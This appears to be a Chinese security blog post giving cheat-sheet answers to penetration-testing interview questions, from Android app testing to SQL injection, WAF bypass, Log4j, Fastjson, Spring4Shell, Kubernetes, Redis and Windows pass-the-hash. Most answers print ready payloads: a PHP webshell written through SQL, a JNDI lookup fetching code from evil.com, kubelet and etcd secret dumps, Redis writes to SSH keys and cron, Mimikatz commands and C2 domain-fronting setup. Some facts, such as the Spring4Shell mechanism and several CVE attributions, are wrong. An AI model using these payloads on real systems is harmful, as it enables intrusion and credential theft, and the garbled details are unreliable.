安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[1081 APP测试经验](#1081 APP测试经验)
[1082 Xposed 框架与解密实践](#1082 Xposed 框架与解密实践)
[1095 安卓 RCE 思路](#1095 安卓 RCE 思路)
[1096 Cloud 环境移动端利用](#1096 Cloud 环境移动端利用)
[1083 SQL 注入写马方式](#1083 SQL 注入写马方式)
[1084 Oracle 注入直接利用](#1084 Oracle 注入直接利用)
[1101 SQL 注入截断方案](#1101 SQL 注入截断方案)
[1085 绕过语义检测 WAF](#1085 绕过语义检测 WAF)
[1086 安全 Response Headers](#1086 安全 Response Headers)
[1087 CS 域前置原理 & 流量路径](#1087 CS 域前置原理 & 流量路径)
[1088 Kerberos 原理](#1088 Kerberos 原理)
[1089 Log4j 绕过 trustCodeBase](#1089 Log4j 绕过 trustCodeBase)
[1090 SpringBoot+Shiro 渗透](#1090 SpringBoot+Shiro 渗透)
[1091 Fastjson 版本探测](#1091 Fastjson 版本探测)
[1092 Fastjson 文件读写 Gadget](#1092 Fastjson 文件读写 Gadget)
[1093 Spring4Shell 漏洞](#1093 Spring4Shell 漏洞)
[1097 K8s & Docker 攻击方式](#1097 K8s & Docker 攻击方式)
[1098 CS 域前置 & 云函数配置](#1098 CS 域前置 & 云函数配置)
[1099 内网可利用设备](#1099 内网可利用设备)
[1100 Redis 攻击系统差异](#1100 Redis 攻击系统差异)
[1102 Windows 10 PTH 利用](#1102 Windows 10 PTH 利用)
[1094 后台登录框利用思路](#1094 后台登录框利用思路)
1081 说说你APP测试的经验 1082 xposed用的什么框架,有没有自己写过app解密 1083 sql注入写马有哪些方式? 1084 oracle注入除了注入之外有哪些直接利用的方式? 1085 如何绕过基于语义检测的waf,比如雷池,阿里云waf等 1086 信息安全相关的返回 response 头 1087 cs 域前置的原理?流量是怎么通信的?从我直接执行一个命令,例如 whoami,然后到 机器上,中间的流量是怎么走的? 1088 kerberos 原理 1089 log4j 如何绕过 trustcodebase 1090 Springboot+shiro 环境如何进行渗透 1091 实战中如何判断 fastjson 的版本 1092 Fastjson 文件读写 gadget 是哪条,原理是什么 1093 Spring4shell 原理&检测&利用 1094 给一个后台登录框有什么利用思路 1095 安卓系统如何进行 rce,有什么思路 1096 给一个移动端的 app,已知服务端是 cloud 环境,有什么思路利用 1097 k8s 和 docker 如何去做攻击 有哪些利用方式 是什么原因导致的 1098 cs 的域前置和云函数如何去配置 1099 内网攻击的时候 内网有那些设备可以利用 (hadoop kibana 之类的设备) 1100 攻击 redis 不同的 linux 系统有什么不同 1101 sql 注入的时候,如果遇到了返回的时候长度不够,怎么解决,如何截取,用什么函数截 取 1102 windows10上面的pth怎么利用一、移动安全方向
1081 APP测试经验
- 漏洞扫描
- 使用 MobSF 静态分析:检测硬编码密钥、不安全存储
- Drozer 动态测试:组件暴露(
android:exported=true)、权限绕过- 通信安全
- BurpSuite 抓包:检查 HTTPS 证书校验(X.509 信任链绕过)
- 中间人攻击:Frida Hook
checkClientTrusted()方法- 逆向分析
- Jadx/Ghidra 反编译:定位加密算法(AES 弱密钥、ECB 模式风险)
- Frida 运行时调试:Hook
getSecretKey()获取内存密钥1082 Xposed 框架与解密实践
- 常用框架:LSPosed(兼容 Android 12+)、EdXposed(旧版兼容)
- APP 解密案例 :
- Hook
javax.crypto.Cipher.init()获取密钥参数- 针对白盒 AES:插桩提取 S-Box 内容
- 证书固定破解:Hook
OkHttpClient的CertificatePinner1095 安卓 RCE 思路
- 漏洞触发点 :
- WebView 漏洞(CVE-2019-5765):
setJavaScriptEnabled(true)+ 未校验 URL- 反序列化攻击:
Bundle.putSerializable()传递恶意对象- 利用链构造 :
- 融合 CVE-2023-20900(Intent 重定向)绕过权限限制
1096 Cloud 环境移动端利用
- 攻击链设计 :
- 逆向 APP 获取云 API 密钥(常见于
res/raw/config.json)- 利用云函数缺陷:
- 阿里云 FC:修改
event参数触发命令注入- AWS Lambda:环境变量泄露访问密钥
- 横向移动:通过云服务元数据获取 IAM 角色凭证(
169.254.169.254)
二、注入与数据库安全
1083 SQL 注入写马方式
数据库 方法 MySQL SELECT '<?php @eval($_POST[cmd]);?>' INTO OUTFILE '/var/www/shell.php'SQL Server 启用 OLE Automation→sp_oacreate调用ADODB.Stream写文件Oracle UTL_FILE写文件(需CREATE DIRECTORY权限)1084 Oracle 注入直接利用
权限提升 :
Sql
GRANT DBA TO CURRENT_USER; -- 利用 CVE-2012-3137 漏洞攻击命令执行 :
- Linux 系统:
DBMS_SCHEDULER.create_job调用/bin/bash- Windows 系统:
DBMS_XMLDOM.newdom触发 SMB 中继攻击数据窃取 :
- 通过
CTXSYS.DRILOAD读取系统文件(需CTXAPP角色)1101 SQL 注入截断方案
分块读取 :
Sql
SUBSTRING((SELECT @@version), 1, 30) -- 分段获取前30字符编码绕过 :
Sql
SELECT TO_BASE64(LOAD_FILE('/etc/passwd')) -- MySQL 编码输出时间盲注 :
Sql
IF(ASCII(SUBSTR((SELECT user),1,1))>100, SLEEP(5), 1) -- 通过时延判断
三、WAF绕过与协议分析
1085 绕过语义检测 WAF
- 混淆技术 :
- SQL 注入:
/*!50000SELECT*/(MySQL 版本特性绕过)- XSS:
<img/src=1/onerror=alert(1)>(非常规标签分隔)- 协议层级绕过 :
- 分块传输(Transfer-Encoding: chunked)
- 畸形的 HTTP 头:
Content-Length: 0与实际 body 长度不符- 雷池 WAF 特性利用 :
- 利用 Unicode 标准化:
%u0061lert(1)→alert(1)1086 安全 Response Headers
Http
Strict-Transport-Security: max-age=63072000; includeSubDomains X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self'; script-src 'nonce-abc123' X-Frame-Options: DENY Referrer-Policy: no-referrer1087 CS 域前置原理 & 流量路径
原理:
- 将 C2 流量伪装成合法 CDN 请求(如 *.cloudfront.net )
流量路径:
Mermaid
graph LR A[受害者] -->|HTTPS 请求| B(CDN 节点 *.example.com) B -->|解密真实域名| C[C2 Server] C -->|响应加密| B --> A执行命令流程:
- 受害者 → CDN:
GET /api?key=加密(whoami)- CDN 转发至真实 C2
- C2 返回加密响应 → CDN → 受害者解密执行
1088 Kerberos 原理
- 认证流程 :
- AS_REQ:用户向 KDC 请求 TGT
- AS_REP:KDC 返回用用户密码加密的 TGT
- TGS_REQ:用户发送 TGT 请求服务票据
- TGS_REP:KDC 返回用服务密钥加密的票据
- AP_REQ:用户向服务提交票据
四、漏洞利用专题
1089 Log4j 绕过 trustCodeBase
利用链构造 :
Java
${jndi:ldap://127.0.0.1#.evil.com/Exploit} -- 利用 DNS 重定向绕过原理 :
- Java 的
InetAddress.getByName()解析127.0.0.1#.evil.com时返回127.0.0.1- LDAP 服务实际连接至攻击者控制的 evil.com
1090 SpringBoot+Shiro 渗透
- 密钥爆破 :
- 使用 ShiroAttack2 爆破
rememberMe的 AES 密钥- 反序列化利用 :
- 密钥爆破后构造 CommonsBeanutils1 链执行命令
1091 Fastjson 版本探测
- 响应特征 :
- 发送
{"@type":"java.net.Inet4Address"}→ 报错含autoTypeSupport即为 ≥1.2.48- 低版本直接触发
autoType漏洞1092 Fastjson 文件读写 Gadget
利用链 :
Json
{ "@type": "com.alibaba.fastjson.JSONObject", "x": { "@type": "java.lang.AutoCloseable", "@type": "java.io.FileOutputStream", "file": "/tmp/test", "append": false } }
原理 :通过异常处理机制触发FileOutputStream.write()1093 Spring4Shell 漏洞
原理 :JDK ≥9 下
ClassLoader的getResources()可访问module-info.class导致目录穿越检测 :
Http
POST /user/list?class.module.classLoader=URLClassLoader
观察 400 响应中是否泄露module-info.class利用 :
Bash
curl -X POST 'http://target/page?class.module.classLoader.resources.context.parent.pipeline.first.pattern=<%25{...}%>' -d ''
五、内网与云原生攻击
1097 K8s & Docker 攻击方式
攻击面 方法 根本原因 Docker 逃逸 挂载宿主机目录: -v /:/host配置不当(特权容器) K8s API 未授权 获取 Secrets: curl https://node:10250/secretsRBAC 配置错误 ETCD 未鉴权 读取集群凭证: etcdctl get / --prefix未启用 TLS 认证 1098 CS 域前置 & 云函数配置
- 域前置配置 :
- 在 C2 配置中设置
Host Header为合法域名(如cdn.example.com)- 修改 Malleable C2 的
http-stager段匹配 CDN 特征- 云函数(以 AWS 为例) :
- 创建 Lambda 函数转发流量至 C2
- API Gateway 绑定自定义域名并配置 SSL
1099 内网可利用设备
- 大数据系统 :
- Hadoop YARN:未授权访问 →
curl -X POST 'http://ip:8088/ws/v1/cluster/apps'提交恶意应用- 日志系统 :
- Kibana:CVE-2019-7609 原型链污染 RCE
1100 Redis 攻击系统差异
系统 利用方式 Ubuntu 写 SSH 公钥: config set dir /root/.sshAlpine 覆盖 crontab:config set dir /etc/cron.dCentOS 写 WebShell: config set dir /var/www/html
六、其他实战技巧
1102 Windows 10 PTH 利用
- 受限场景 :
- 使用 Mimikatz:
sekurlsa::pth /user:admin /domain:test /ntlm:xxxx- 绕过限制 :
- 启用 Restore-Service:修复被破坏的 PTH 功能
- 利用 SMB 中继:Responder 捕获 NTLMv1 → 离线破解
1094 后台登录框利用思路
- 凭证爆破 :
- 结合 Burp Intruder 的
Pitchfork模式(多字典组合)- 漏洞挖掘 :
- 修改
Content-Type: application/json测试 JSON 注入- 添加
X-Forwarded-For: 127.0.0.1绕过 IP 限制